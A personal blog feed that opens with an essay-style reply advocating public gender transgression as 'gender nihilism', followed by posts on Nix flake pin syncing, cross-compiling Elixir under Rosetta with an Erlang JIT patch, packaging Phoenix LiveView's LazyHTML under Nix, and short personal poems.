your stated goals in this piece are to refactor your earlier work, which is based around a proposed discarding of the entire concept of gender identity, into an actionable and theoretical framework. but other than convince me that gender diverse persons would likely be somewhat better treated under communism, which i would have accepted without question before i even read this article. you haven’t actually generated any framework except one based around binary gender. if that were acceptable, we wouldn’t be in the case where we need recognition and special rights at all, so we would never have to have this tedious discussion in the first place. the whole reason we ARE having this discussion is because trans people exist, we have existed since well before capitalism was pervasive, and we wanted to self-identify so that we could find each other and organize. you are absolutely correct in your original article about the problems that seeking recognition brings. the desire for recognition and the introduction/propagation of labels reifies the violence contained in the binary and focuses transphobia down onto the people most vulnerable. but your new solution is an order of magnitude worse. it’s actively transphobic itself. you went from a theory that affirms all gender expressions by discarding the need to identify at all, to one that reverts to an incomplete, binarist view of gender which actively excludes the same people that the theory was supposed to be serving in the first place. given this, i would like to propose my own alternate solution for gender nihilism, one which can be immediately put into action by any interested party who wants to do something productive instead of ‘daring imaginations of new futures’, which i have been doing pretty much all day now, with less than stellar results, as you can see.

rather than a passive negation, or a wistful hope for an unplanned, and therefore highly improbable future, i propose an immediate, active, destructive gender nihilism, a critique, not a program, centered fully upon this moment, one that transmits itself through propaganda of the deed, deliberate and public acts of gender transgression, constant and relentless confrontation and challenging of norms. a gender terrorism, if you will. a rejection of gender identity and gender roles, but one in active, deliberate motion. these acts incite the viewer to question their own beliefs and preconceptions about gender. these acts are as likely to be performed by gender conforming or gender nonconforming people, they can be permanent or temporary, and they offer a degree of security to the gender nonconforming people who participate in them, as they can’t be readily identified. these acts don’t even need to be conscious — it’s easy enough to identify movements like the metrosexual movement which, although toothless and comical in many ways, represented a significant and, i would argue, more or less permanent refactor to the socially accepted gender presentation of men. these acts are inherently threatening to the bourgeoisie, who, as you very correctly noted, use the concept of binary gender as well as many other constructed identities to divide and attack individuals within their class. they are disrupting to transphobic hate groups as they obscure the identities of trans people by making the ‘definition’ of their gender presentation overlap with other gender identites (for example, consider if wearing dresses was a common act for men. how would people know at a glance who was a non-passing trans woman? more practically, what if non-passing trans women dressed like butch lesbians instead of the stereotype of non-passing trans women as drag queens? would anybody even pick up on that at all? this is a common angle of attack for me, by the way. these are just a few examples. there is a universe of highly transgressive gender shit out there.) i propose that these acts of gender transgression are part of an emergent, decentralized process that is already ongoing and, indeed, this is one of the reasons for the current proliferation of gender identities.

the battle has already been joined, and it started in earnest when time magazine announced the ‘transgender tipping point’, at which point this shit hit the mainstream consciousness like a fat line of fentanyl, sending the entire trans community into distressed spasms and respiratory arrest as we were thrust into the spotlight. months later, caitlyn jenner was the worst possible reminder to cis folks that we exist. the only immediate and logical response to our bad press is to act visibly in ways that cause people to openly question and reject the categories that have been constructed, as well as rethink their preconceptions and stereotypes within those categories. as society loses its ability to differentiate between gender identity, gender presentation, fashion, body modification, improvisation, sex, practical jokes, and so on and so forth, our ability to conceive of any cohesive gender identity will be crippled. as we expand the acceptable presentation for any gender in the mind of average people, the lines that were drawn between once clear categories become more and more blurred. in short, we DDOS gender identity, spamming absurd and unique identities, showing in the process the incoherence of all identities, adopting a thousand masks that might or might not be our own, sabotaging entire categories. show people there is not anything sacred there, that we’re just trying things out to see how we like them, and that this is perfectly fine and good and safe. make people smile instead of making them feel trapped in a prescribed role, make people think about their own identity in the process. the natural conclusion of this process is a negation of gender entirely — beginning with the observation that no label can perfectly describe your unique and mutable self-expression. increased visibility of gender transgression also serves over time to normalize these presentations, which avoids the dehumanizing, us-vs them effects of identity.

as a side note, this sort of conception of gender exists in other places in the world today, such as japan, where gender non-conformity, especially for ‘males’, is significantly more accepted than in the western world. do you reckon this is because of market or political forces?

essentially, i propose we do what the trans community has been doing this whole time. we just trans even harder. find new and dangerous ways to do it. find ways to make it out safe. initiate others. don’t police identity, but make a show of reinventing ourselves so many times and so radically that identity’s true nature is exposed — it is nothing at all.

or, you know, we could just wait for the rev and then revisit the whole growing people in vats idea, or just all forget who we were completely somehow

y’know what, i’m gonna keep doing it my way for now since its getting me results that i can actually quantify. just let me know when you need me to pick up an ak47 or write some software for the people’s army. just dont tell me to pick boy or girl.

-blister

íqán — sync Nix flake pins between projects.

2025-08-05T04:03:45Z

I use Nix flakes a lot — both in development, and in how I deploy artefacts. (You can see my primary flake’s 17 inputs!)

One thing that has gotten a bit annoying, though, has been keeping the pins somewhat in sync. I regularly end up with a dozen nixpkgs and fenix and (etc. etc. etc.) variants in my Nix store, meaning I’d also have half a dozen different Rust, Erlang, Elixir and whatever other versions installed too. If I dare nix-collect-garbage -d, then working on any given project might give me a surprise as it turns out it had a slightly older pin and I actually need to wait for its special magical Elixir version.

And so on!

Using inputs.X.follows is all good and well when combining them into a unified whole, but I don’t use (and don’t intend to use) global devShells — I want each project to stand on its own. So, instead, I want a way to compare and optionally sync the locked versions from some reference to my projects. For a while I found it was a good enough hack to just cp ~/g/vyx/flake.lock . and then let the next Nix invocation remove all the irrelevant ones … but then I’d introduce a dependency which hitched its own nixpkgs along for the ride, and for Reasons™ that would get called "nixpkgs" in flake.lock, and my actual primary Nixpkgs pin called "nixpkgs_2". For a while I was then accidentally using that reference everywhere. Goodness.

Here’s íqán. It takes a plan file, which specifies the source (Vyx, for me), and then a list of targets along with which inputs should be synced. Here’s an excerpt of a sample run:

$ iqan ./iqan.json
Source: /Users/kivikakk/g/vyx

Target: /Users/kivikakk/g/a1d
-----------------------------
input nixpkgs is synced
input fenix is synced

Target: /Users/kivikakk/g/chog
------------------------------
input nixpkgs is synced

Target: /Users/kivikakk/g/cmark-gfm-hs
--------------------------------------
input nixpkgs is synced

Target: /Users/kivikakk/g/comenzar
----------------------------------
input nixpkgs is ahead of source (!)
source: 1751741127 (2025-07-05 18:45:27 UTC)
target: 1752620740 (2025-07-15 23:05:40 UTC)
(S)ync to source, or (I)gnore? s

Target: /Users/kivikakk/g/comrak
--------------------------------
input nixpkgs is behind source
source: 1751741127 (2025-07-05 18:45:27 UTC)
target: 1748437600 (2025-05-28 13:06:40 UTC)
(S)ync to source, or (I)gnore? s
input "fenix" has an original mismatch
source: github:nix-community/fenix
target: github:nix-community/fenix/monthly
(S)ync to source, or (I)gnore? s
[!!!] update flake.nix please!

Target: /Users/kivikakk/g/iqan
------------------------------
input nixpkgs is synced
input fenix is synced

Target: /Users/kivikakk/g/kivikakk
----------------------------------
input nixpkgs is synced

Target: /Users/kivikakk/g/koino
-------------------------------
input nixpkgs is synced

Target: /Users/kivikakk/g/kv
----------------------------
input nixpkgs is synced
input fenix is synced

Target: /Users/kivikakk/g/nossa
-------------------------------
input nixpkgs is synced
input fenix is synced

Target: /Users/kivikakk/g/notes
-------------------------------
input nixpkgs is synced

Target: /Users/kivikakk/g/outfoxsync
------------------------------------
input "nixpkgs" has an original mismatch
source: github:NixOS/nixpkgs/nixos-25.05
target: github:NixOS/nixpkgs/nixos-24.11
(S)ync to source, or (I)gnore? s
[!!!] update flake.nix please!
$

It does the job. :)

Argon ONE V3 fan/power controller.

2025-08-04T11:34:51Z

Seems almost a rite of passage to write one’s own for this accursed piece of hardware.

(The hardware’s actually quite OK, screw threading notwithstanding, but Argon 40 cannot write software to save themselves.)

https://nossa.ee/~talya/a1d

tangential

2025-08-03T14:11:49Z

cw: death, drugs, I am Sad

once, my sister thought she was dying.

after decades of alcohol and painkiller abuse, they’d called it — end-stage liver failure,

no chance of a transplant.

she called me with the news, crying, drunk maybe,

and in our conversation she asked if i had struggled with addiction, for we rarely spoke,

and i told her i had and did, and mentioned how,

and she laughed at me.

they would turn out to have been mistaken, and she did not die.

later that year i would pay for months of rehab for her,

because nobody else [cw]ould.

this is probably the best sibling relationship i have.

Cross-compiling Elixir for x86_64-linux on aarch64-darwin.

2025-08-03T01:59:11Z

Start with github:cpick/nix-rosetta-builder.
- You might be interested in my fork; it targets Linux 6.12.29, applies Apple’s “Accelerating the performance of Rosetta” kernel patch, and incorporates upstream PR #34 (why not).
- I add a rosettaAot option to run rosettad, but don’t use it. The results crash far too often. See e.g..
Serving suggestion (adjust for your machine):
```
nix-rosetta-builder = {
  enable = true;
  cores = 12;
  diskSize = "100GiB";
  memory = "16GiB";
  onDemand = true;
};
```
That’s it! It’ll spin itself up when needed (you might need to retry the build since the first attempt might timeout while it starts up on-demand), and down again after a while of inactivity. Now you can do something like nix build .#packages.x86_64-linux.chog and it’ll Just Work™.

Whoops! I lied. You’ll get perhaps a lot of things like this:

error: build of '/nix/store/9dhn75m3isw55qz29dzw1h8xzs634pim-salchicha-0.4.0.drv' on 'ssh-ng://rosetta-builder' failed: builder for '/nix/store/9dhn75m3isw55qz29dzw1h8xzs634pim-salchicha-0.4.0.drv' failed with exit code 132;
       last 9 log lines:
       > Running phase: unpackPhase
       > unpacking source archive /nix/store/l05szcgqqaxxc9i1hd16ik8kd9vv5cn2-salchicha-0.4.0
       > source root is salchicha-0.4.0
       > Running phase: patchPhase
       > Running phase: updateAutotoolsGnuConfigScriptsPhase
       > Running phase: configurePhase
       > Running phase: buildPhase
       > Compiling 3 files (.ex)
       > /nix/store/qjjpd1310d6qi63pdmjigykcznfi3n4y-stdenv-linux/setup: line 1765:    44 Illegal instruction     (core dumped) mix compile --no-deps-check
       For full logs, run:
         nix log /nix/store/9dhn75m3isw55qz29dzw1h8xzs634pim-salchicha-0.4.0.drv
error: builder for '/nix/store/9dhn75m3isw55qz29dzw1h8xzs634pim-salchicha-0.4.0.drv' failed with exit code 1

error: build of '/nix/store/3jfv7sghsansgg4sgihqkcsxg925zfrj-jason-1.4.4.drv' on 'ssh-ng://rosetta-builder' failed: builder for '/nix/store/3jfv7sghsansgg4sgihqkcsxg925zfrj-jason-1.4.4.drv' failed with exit code 134;
       last 12 log lines:
       > Running phase: unpackPhase
       > unpacking source archive /nix/store/km205nlk52awji63d5hynwnypdpfqqm3-jason-1.4.4
       > source root is jason-1.4.4
       > Running phase: patchPhase
       > Running phase: updateAutotoolsGnuConfigScriptsPhase
       > Running phase: configurePhase
       > Running phase: buildPhase
       > Compiling 10 files (.ex)
       > no next heap size found: 2305825417165001762, offset 0
       >
       > Crash dump is being written to: erl_crash.dump...done
       > /nix/store/qjjpd1310d6qi63pdmjigykcznfi3n4y-stdenv-linux/setup: line 1765:    44 Aborted                 (core dumped) mix compile --no-deps-check
       For full logs, run:
         nix log /nix/store/3jfv7sghsansgg4sgihqkcsxg925zfrj-jason-1.4.4.drv
error: builder for '/nix/store/3jfv7sghsansgg4sgihqkcsxg925zfrj-jason-1.4.4.drv' failed with exit code 1

Just give me the fix.

Assuming you have pkgs from somewhere:

let
  erlang = pkgs.beam_minimal.interpreters.erlang_27;
  erlang-jmsingle =
    (erlang.override {
      patches = [
        ./nix/erlang_beam_jit_main.cpp.patch
      ];
    }).overrideAttrs
      (prev: {
        preConfigure = ''
          ${prev.preConfigure or ""}
  
          configureFlagsArray+=(CFLAGS="-O2 -g -DFORCE_ERTS_JIT_SINGLE_MAP=1")
        '';
      });

  mkPackageWithErlang =
    erlang:
    let
      beamPackages = pkgs.beam_minimal.packagesWith erlang;
      elixir = beamPackages.elixir_1_18;
    in
    pkgs.callPackage ./nix/package.nix {
      inherit
        beamPackages
        erlang
        elixir
        ;
    };

Note that -O2 -g are defaults for the Erlang build — we have to specify them again since we’re overriding CFLAGS as a whole.

Here’s the patch:

diff --git a/erts/emulator/beam/jit/beam_jit_main.cpp b/erts/emulator/beam/jit/beam_jit_main.cpp
index 8408b25056..d941532e5f 100644
--- a/erts/emulator/beam/jit/beam_jit_main.cpp
+++ b/erts/emulator/beam/jit/beam_jit_main.cpp
@@ -188,6 +188,8 @@ static JitAllocator *pick_allocator() {
      * 64-bit x86 still uses dual-mapped memory as it lacks support for per-
      * thread permissions and thus gets unprotected RWX pages with MAP_JIT. */
     erts_jit_single_map = 1;
+#elif defined(FORCE_ERTS_JIT_SINGLE_MAP)
+    erts_jit_single_map = 1;
 #endif
 
 #if defined(HAVE_LINUX_PERF_SUPPORT)

Now you can expose packages like:

packages = rec {
  default = chog;

  chog = mkPackageWithErlang erlang;
  chog-jmsingle = mkPackageWithErlang erlang-jmsingle;
};

Finally, your cross compile is nix build .#packages.x86_64-linux.chog-jmsingle.

???

Let’s read the erts erl command manual together:

+JMsingle true|false - Enables or disables the use of single-mapped RWX memory for JIT code.

The default is to map JIT:ed machine code into two regions sharing the same physical pages, where one region is executable but not writable, and the other writable but not executable. As some tools, such as QEMU user mode emulation, cannot deal with the dual mapping, this flags allows it to be disabled. This flag is automatically enabled by the +JPperf flag.

Since: OTP 26.0

“Some tools” also includes Rosetta, it turns out. You’ll find some advice on Internet suggesting you use +JPperf with a variety of options to fix this issue, but it’s all cargo-culted — it’s the side-effect of setting +JMsingle true that makes it work. The above patch causes the flag to be set unilaterally.

The solution I present here has downsides:

You’re no longer using separate RW/RX mappings, which has (somewhat theoretical) security implications. RIP points to writeable memory!
We have to patch Erlang to make this happen consistently! I so wish we didn’t, but I couldn’t figure out a way to get the actual +JMsingle flag to propagate and be set in every single place necessary — namely, every single Erlang/Elixir/etc. invocation. The result is toolchain bloat.
The resulting builds therefore differ from those without it.

I use this for testing and building x86_64 artifacts from the comfort of my laptop, but when I actually deploy on x86_64, I build the regular versions on a target machine.

May this help someone!

deps_nix, not mix2nix!

2025-08-01T03:17:22Z

Oh my goodness. Turns out deps_nix exists, and it obviates not only half of the hacks from yesterday, but also many, many more I’d just accepted as unavoidable, and something I’d have to build some tooling around. Well, looks like someone already has :)

Using Phoenix LiveView 1.1 with Nix

2025-07-31T06:00:16Z

LiveView v1.1 has been released! I like to keep on top of Phoenix’s updates; the ecosystem moves at a reasonable and steady pace, and the direction is in general good. (Not sure I care for colocated hooks yet, but change tracking in comprehensions is extremely welcome, it’s nice to be able to ditch @types/phoenix_live_view, and <.portal> looks neat!)

LazyHTML is a new dependency, and you bet it tries to download pre-compiled dependencies. I never want that, and Nix is so good to me by simply Not Permitting It:

lazy_html> Running phase: unpackPhase
lazy_html> unpacking source archive /nix/store/qlgi3hx2syzhzq2r8l5b8xd42zzwrvb5-lazy_html-0.1.3
lazy_html> source root is lazy_html-0.1.3
lazy_html> Running phase: patchPhase
lazy_html> Running phase: updateAutotoolsGnuConfigScriptsPhase
lazy_html> Running phase: configurePhase
lazy_html> Running phase: buildPhase
lazy_html> ** (File.Error) could not make directory (with -p) "/homeless-shelter/Library/Caches/elixir_make": no such file or directory
lazy_html>     (elixir 1.18.4) lib/file.ex:346: File.mkdir_p!/1
lazy_html>     (elixir_make 0.9.0) lib/elixir_make/artefact.ex:22: ElixirMake.Artefact.cache_dir/0
lazy_html>     (elixir_make 0.9.0) lib/elixir_make/artefact.ex:85: ElixirMake.Artefact.archive_path/3
lazy_html>     (elixir_make 0.9.0) lib/mix/tasks/compile.elixir_make.ex:226: Mix.Tasks.Compile.ElixirMake.download_or_reuse_nif/3
lazy_html>     (elixir_make 0.9.0) lib/mix/tasks/compile.elixir_make.ex:169: Mix.Tasks.Compile.ElixirMake.run/1
lazy_html>     (mix 1.18.4) lib/mix/task.ex:495: anonymous fn/3 in Mix.Task.run_task/5
lazy_html>     (mix 1.18.4) lib/mix/tasks/compile.all.ex:117: Mix.Tasks.Compile.All.run_compiler/2
lazy_html>     (mix 1.18.4) lib/mix/tasks/compile.all.ex:97: Mix.Tasks.Compile.All.compile/4

Close enough, you get the idea — elixir_make tried to create $HOME/Library/Caches/elixir_make (because this is nix-darwin), and if it had succeeded, would have failed to then actually download anything. How will we figure this out?

tl;dr

override your lazy_html and fine builds with some ~~patches~~ (edit: see the end of the post!), and
declare lazy_html config to avoid application env compile-time/runtime mismatch issues.

Step one: stop LazyHTML from trying to use pre-compiled dependencies

Assuming you’ve produced deps.nix with mix2nix, we patch out the pre-compilation configuration from LazyHTML’s mix.exs:

let
  mixNixDeps = import ./deps.nix {
    inherit lib beamPackages;

    overrides = final: prev: {
      lazy_html = prev.lazy_html.overrideAttrs {
        patches = [
          ./lazy_html-mix.exs.patch
        ];
      };
    };
  };

diff --git a/mix.exs b/mix.exs
index fa0be6f..0f40d16 100644
--- a/mix.exs
+++ b/mix.exs
@@ -24,11 +24,6 @@ defmodule LazyHTML.MixProject do
           "LEXBOR_VERSION" => @lexbor_version
         }
       end,
-      # Precompilation
-      make_precompiler: {:nif, CCPrecompiler},
-      make_precompiler_url: "#{@github_url}/releases/download/v#{@version}/@{artefact_filename}",
-      make_precompiler_filename: "liblazy_html",
-      make_precompiler_nif_versions: [versions: ["2.16"]]
     ]
   end
 
@@ -42,7 +37,6 @@ defmodule LazyHTML.MixProject do
     [
       {:fine, "~> 0.1.0"},
       {:elixir_make, "~> 0.9.0"},
-      {:cc_precompiler, "~> 0.1", runtime: false},
       {:ex_doc, "~> 0.36", only: :dev, runtime: false}
     ]
   end

elixir_make does have a config key, :force_build, but we’d have to patch LazyHTML to include it either way: this build is completely independent of your application, so setting it in your own config won’t do anything at Nix build time, and there’s no environment variable equivalent like RUSTLER_PRECOMPILED_FORCE_BUILD_ALL.

And the result:

lazy_html> Running phase: unpackPhase
lazy_html> unpacking source archive /nix/store/qlgi3hx2syzhzq2r8l5b8xd42zzwrvb5-lazy_html-0.1.3
lazy_html> source root is lazy_html-0.1.3
lazy_html> Running phase: patchPhase
lazy_html> applying patch /nix/store/vk0kvy6ih5nwr75k7yzi8k8nnggycy6w-lazy_html-mix.exs.patch
lazy_html> patching file mix.exs
lazy_html> Running phase: updateAutotoolsGnuConfigScriptsPhase
lazy_html> Running phase: configurePhase
lazy_html> Running phase: buildPhase
lazy_html> make: git: No such file or directory
lazy_html> make: *** [Makefile:50: /private/tmp/nix-build-lazy_html-0.1.3.drv-0/lazy_html-0.1.3/_build/c/third_party/lexbor/2.4.0] Error 127
lazy_html> ** (Mix) Could not compile with "make" (exit status: 2).
lazy_html> You need to have gcc and make installed. Try running the
lazy_html> commands "gcc --version" and / or "make --version". If these programs
lazy_html> are not installed, you will be prompted to install them.
lazy_html>

LazyHTML wraps Lexbor, a C library used for its HTML engine, and here it is trying to download its source at compile-time. (If you make git available to the build, Nix will block its network access.)

Step two: fetch Lexbor’s source ourselves

Let’s declare the version of Lexbor we want, fetch that from GitHub, and then put it where LazyHTML’s Makefile would clone it to. We also check that the version we’ve declared matches the one in LazyHTML’s mix.exs, so we’ll notice if it changes.

(You could try to extract this automatically, but you’ll have to update the hash manually either way. I’ll also skip the step where this fails because the build wants cmake and just give it cmake.)

let
  mixNixDeps = import ./deps.nix {
    inherit lib beamPackages;

    overrides = final: prev: {
      lazy_html = prev.lazy_html.overrideAttrs (
        prevAttrs:
        let
          lexborVersion = "2.4.0";
          lexbor = pkgs.fetchFromGitHub {
            owner = "lexbor";
            repo = "lexbor";
            tag = "v${lexborVersion}";
            hash = "sha256-wsm+2L2ar+3LGyBXl39Vp9l1l5JONWvO0QbI87TDfWM=";
          };
        in
        {
          nativeBuildInputs = prevAttrs.nativeBuildInputs ++ (with pkgs; [ cmake ]);

          prePatch = ''
            # ensure the version is in sync.
            grep -q '@lexbor_version "${lexborVersion}"' mix.exs
            mkdir -p _build/c/third_party/lexbor
            cp -r ${lexbor} _build/c/third_party/lexbor/${lexborVersion}
            chmod -R u+w _build/c/third_party/lexbor/${lexborVersion}
          '';

          patches = [
            ./lazy_html-mix.exs.patch
          ];
        }
      );
    };
  };

Now we successfully build Lexbor as part of LazyHTML, yay! But then:

lazy_html> [ 99%] Building C object CMakeFiles/lexbor_static.dir/source/lexbor/utils/http.c.o
lazy_html> [ 99%] Building C object CMakeFiles/lexbor_static.dir/source/lexbor/utils/warc.c.o
lazy_html> [100%] Linking C static library liblexbor_static.a
lazy_html> [100%] Built target lexbor_static
lazy_html> make[1]: Leaving directory '/private/tmp/nix-build-lazy_html-0.1.3.drv-0/lazy_html-0.1.3/_build/c/third_party/lexbor/2.4.0/build'
lazy_html> clang++ -shared -fPIC -fvisibility=hidden -std=c++17 -Wall -Wextra -Wno-unused-parameter -Wno-comment -I/nix/store/62pchbdm94l23xcd9c7z76pywli4v9r0-erlang-27.3.4.1/lib/erlang/erts-15.2.7/include -I/private/tmp/nix-build-fine-0.1.2.drv-0/fine-0.1.2/include -I/private/tmp/nix-build-lazy_html-0.1.3.drv-0/lazy_html-0.1.3/_build/c/third_party/lexbor/2.4.0/source -O3 -undefined dynamic_lookup -flat_namespace /private/tmp/nix-build-lazy_html-0.1.3.drv-0/lazy_html-0.1.3/c_src/lazy_html.cpp /private/tmp/nix-build-lazy_html-0.1.3.drv-0/lazy_html-0.1.3/_build/c/third_party/lexbor/2.4.0/build/liblexbor_static.a -o /private/tmp/nix-build-lazy_html-0.1.3.drv-0/lazy_html-0.1.3/_build/prod/lib/lazy_html/priv/liblazy_html.so
lazy_html> /private/tmp/nix-build-lazy_html-0.1.3.drv-0/lazy_html-0.1.3/c_src/lazy_html.cpp:3:10: fatal error: 'fine.hpp' file not found
lazy_html>     3 | #include <fine.hpp>
lazy_html>       |          ^~~~~~~~~~
lazy_html> 1 error generated.
lazy_html> make: *** [Makefile:38: /private/tmp/nix-build-lazy_html-0.1.3.drv-0/lazy_html-0.1.3/_build/prod/lib/lazy_html/priv/liblazy_html.so] Error 1
lazy_html> ** (Mix) Could not compile with "make" (exit status: 2).
lazy_html> You need to have gcc and make installed. Try running the
lazy_html> commands "gcc --version" and / or "make --version". If these programs
lazy_html> are not installed, you will be prompted to install them.
lazy_html>

LazyHTML depends on Fine, and if you squint at that last output, you’ll see this argument to clang++:

-I/private/tmp/nix-build-fine-0.1.2.drv-0/fine-0.1.2/include

Fine reports its own include directory in Fine.include_dir/0 like this:

defmodule Fine do
  # [...]

  @include_dir Path.expand("include")

  @doc """
  Returns the directory with Fine header files.
  """
  @spec include_dir() :: String.t()
  def include_dir(), do: @include_dir
end

This resolves the absolute path of the include dir relative to the current working directory at compile time. If you’re building Fine in the same filesystem as its dependent, this works great — Mix changes the cwd to each project’s root as it goes. If not, you’ll have a compiled-in path that may not exist when you try to use it, which is exactly what’s happened above — that’s the Fine sandbox path being used while we’re building in LazyHTML’s sandbox.

Step three: get Fine to report its installed location, not its build-time one

Just one more patch. Just one. I swear. I can stop any time I want.

let
  mixNixDeps = import ./deps.nix {
    inherit lib beamPackages;

    overrides = final: prev: {
      lazy_html = prev.lazy_html.overrideAttrs (
        prevAttrs:
        let
          lexborVersion = "2.4.0";
          lexbor = pkgs.fetchFromGitHub {
            owner = "lexbor";
            repo = "lexbor";
            tag = "v${lexborVersion}";
            hash = "sha256-wsm+2L2ar+3LGyBXl39Vp9l1l5JONWvO0QbI87TDfWM=";
          };
        in
        {
          nativeBuildInputs = prevAttrs.nativeBuildInputs ++ (with pkgs; [ cmake ]);

          prePatch = ''
            # ensure the version is in sync.
            grep -q '@lexbor_version "${lexborVersion}"' mix.exs
            mkdir -p _build/c/third_party/lexbor
            cp -r ${lexbor} _build/c/third_party/lexbor/${lexborVersion}
            chmod -R u+w _build/c/third_party/lexbor/${lexborVersion}
          '';

          patches = [
            ./lazy_html-mix.exs.patch
          ];
        }
      );

      fine = prev.fine.overrideAttrs {
        patches = [
          ./fine-lib-fine.ex.patch
        ];
      };
    };
  };

diff --git a/lib/fine.ex b/lib/fine.ex
index 277b983..22c8d4f 100644
--- a/lib/fine.ex
+++ b/lib/fine.ex
@@ -8,11 +8,9 @@ defmodule Fine do
 
   @moduledoc readme_docs
 
-  @include_dir Path.expand("include")
-
   @doc """
   Returns the directory with Fine header files.
   """
   @spec include_dir() :: String.t()
-  def include_dir(), do: @include_dir
+  def include_dir(), do: Application.app_dir(:fine, "include")
 end

Instead of resolving something about cwd at compile-time, we resolve the installed application path at runtime. Lovely! 🍴

This now builds successfully! Yay!

And then your application fails bring-up when you’re using the compiled release:

ERROR! the application :lazy_html has a different value set for key :inspect_extra_newline during runtime compared to compile time. Since this application environment entry was marked as compile time, this difference can lead to different behavior than expected:

  * Compile time value was set to: true
  * Runtime value was not set

To fix this error, you might:

  * Make the runtime value match the compile time one

  * Recompile your project. If the misconfigured application is a dependency, you may need to run "mix deps.clean lazy_html --build"

  * Alternatively, you can disable this check. If you are using releases, you can set :validate_compile_env to false in your release configuration. If you are using Mix to start your system, you can pass the --no-validate-compile-env flag


Runtime terminating during boot ({<<"aborting boot">>,[{'Elixir.Config.Provider',boot,2,[]}]})

Crash dump is being written to: erl_crash.dump...⏎

Oop. Turns out LazyHTML’s config.exs declares a single config var to avoid some behaviour in test:

import Config

# We disable the extra newline in test env, because it breaks doctests.
config :lazy_html, :inspect_extra_newline, config_env() != :test

The actual use of this config has the correct default (since this config isn’t used in your dependent application):

  if Application.compile_env(:lazy_html, :inspect_extra_newline, true) do
    defp separator(), do: line()
  else
    defp separator(), do: empty()
  end

But, because we compiled LazyHTML by itself, that explicit true got compiled in, and the lack of runtime value for it means we crash out.

Step four: declare LazyHTML’s config in our application

In your config.exs:

config :lazy_html, :inspect_extra_newline, true

That’s it!

Egumi? Isn’t that a lot of work?

It sure is. Here’s the PRs I opened this morning to make some of this unnecessary:

~~elixir-nx/fine#9: Allow use when separately compiled to Fine’s dependent.~~
- edit: our patch will become even more stylish. See below!
~~dashbitco/lazy_html#11: config: don’t set config at all outside test env.~~
- edit: what a lovely conversation. PR superseded by NixOS/nixpkgs#429770: buildMix: add support for removing target config.
- That (or its equivalent functionality if not accepted) will then need to be used in a PR in mix2nix.

LiveView also now supplies its own types (the DefinitelyTyped ones under @types/phoenix_live_view are good but not ~official~!), but not in a way that seems compatible with certain TypeScript moduleResolution configurations, so:

phoenixframework/phoenix_live_view#3915: package.json: list type exports.

Aside

Technically, a lot of this is on us — we don’t actually need LazyHTML in our build, since it’s marked only: :test — but mix2nix doesn’t exclude it on that basis. phoenix_live_view also declares it as a dependency (albeit with optional: true), but you could do some override shenanigans to excise it entirely.

But: (a) I’ll do what I feel like, and (b) I actually use Floki in my application code, and it has support for a Lexbor-based parser which until now I’ve been unable to use precisely because it entailed all this. Now I can just port my Floki uses to LazyHTML and drop it entirely!

Edit: Fine v0.1.3 no longer includes the includes and it’s all my fault!

Dw bb. Nix gotchu. Get rid of the old patch — our new one is a bit more (and a bit less) dynamic.

fine = prev.fine.overrideAttrs (prevAttrs: {
  prePatch = ''
    sed -i -e "s|@include_dir Path\.expand(\"c_include\")|@include_dir \"${prevAttrs.src}/c_include\"|" lib/fine.ex
  '';
});

include was renamed to c_include — the only reason include was making it into Fine’s application directory was because that’s the directory name used by Erlang .hrl files.

How to solve this? We replace the call to Path.expand/1 with the path to the c_include directory in the source!

I really like knowing this happened right. Let’s decompile the resulting Elixir.Fine.beam file and pull Fine.include_dir/0’s contents:

iex(1)> with {:ok, {Fine, [{:abstract_code, {:raw_abstract_v1, code}}]}} <-
               :beam_lib.chunks(~c"/nix/store/nx1bl8jzsg1ns6yfv237spxbd45n9jxs-fine-0.1.3/lib/erlang/lib/fine-0.1.3/ebin/Elixir.Fine.beam", [:abstract_code]),
             [body] <- for({:function, _, :include_dir, _, body} <- code, do: body),
          do: :erl_prettypr.format(:erl_syntax.form_list(body), ribbon: 100) |> IO.puts()
() -> <<"/nix/store/d54xr3cssgmsj9kwkd04gzvx1jbi2pc3-fine-0.1.3/c_include">>
:ok
iex(2)>

Looks good to me! One question that arises — will this include path definitely be present for all uses of the resulting derivation? It is of course in a different store path — we couldn’t create a store path that referred to itself, after all. I think the answer is no — there’s nothing in the result derivation that tells Nix that the source must stick around.

The answer is to also specify the source derivation in propagatedNativeBuildInputs. What a mouthful. As a quick reviser, for a given derivation, the following definitions generally hold:

buildInputs — dependencies that must exist in the runtime environment.
nativeBuildInputs — dependencies that must exist in the build environment.
propagatedBuildInputs — dependencies that must exist in the runtime environment, and the runtime environment of any downstream user of this package.
propagatedNativeBuildInputs — dependencies that must exist in the build environment, and the build environment of any downstream user of this package.

So:

fine = prev.fine.overrideAttrs (prevAttrs: {
  propagatedNativeBuildInputs = [prevAttrs.src];
  prePatch = ''
    sed -i -e "s|@include_dir Path\.expand(\"c_include\")|@include_dir \"${prevAttrs.src}/c_include\"|" lib/fine.ex
  '';
});

The resulting derivation now has a file nix-support/propagated-native-build-inputs, which lists the source derivation, matching the path compiled into Elixir.Fine.beam. This should mean that any build that depends on fine will be assured of the include directory’s existence at build-time. :)

Maybe this’ll do!

Fortune habits in Nix

2025-07-26T05:57:14Z

Let's implement "Using fortune to reinforce habits" in Nix.

psychological impact of chronic pain

2025-07-24T15:54:41Z

pain is the body’s way of signalling danger

you are always in danger

experimental

2025-07-23T05:16:24Z

The first day of the rest of your life, etc.

2025-07-22T05:15:30Z

12 years today.

sanguichitos!

2025-07-16T11:02:17Z

I have a longer post about k8s cooking, but for now—

An hour and a half ago, I found this to-do created around 2am this morning:

I decided that, as annoying as dealing with Discord and OAuth and all kinds of things is, if I can’t make this happen and have it deployed and managed within the same sit as thinking about it, I need to know that.

The idea in that ellipsis isn’t a very new one: I look at Twitter and like to drop links to art I see there in Discord to my wife/puppygirl/bestie/whatever is going on between us that day. Twitter’s embeds aren’t very good; vxtwitter.com/fxtwitter.com make them better, and so I use them habitually by editing the links manually after pasting/before sending. Automate it with love.

In 90 minutes, I have an Elixir app, reproducibly built with Nix, reproducibly OCI-packaged, and deployed into k8s.

(The curious will find that secret created here — I bring up NixOS with any new secret definitions, vyx creating them via sops, before pushing/having Flux reconcile any new items referring to them.)

It works really well! It’s the same setup for my blog these days (— can’t believe my blog is on k8s, but oh well —), and soon nóssa too.

An-Marlen — kosmoselaeval

2025-07-15T03:32:07Z

First heard the original in a TV ad for Elisa (short example) — for Australian readers, that’s the equivalent of an Optus commercial. Her voice caught me and I had to search for ages to find it. Discovered this live rendition yesterday and it’s just the most beautiful thing ever.

An-Marlen — on a spaceship

I don’t know what to feel without you
You and me together — that’s how it could be
Let me be in love up to my ears, flying in space
You and me together, that’s how it could be
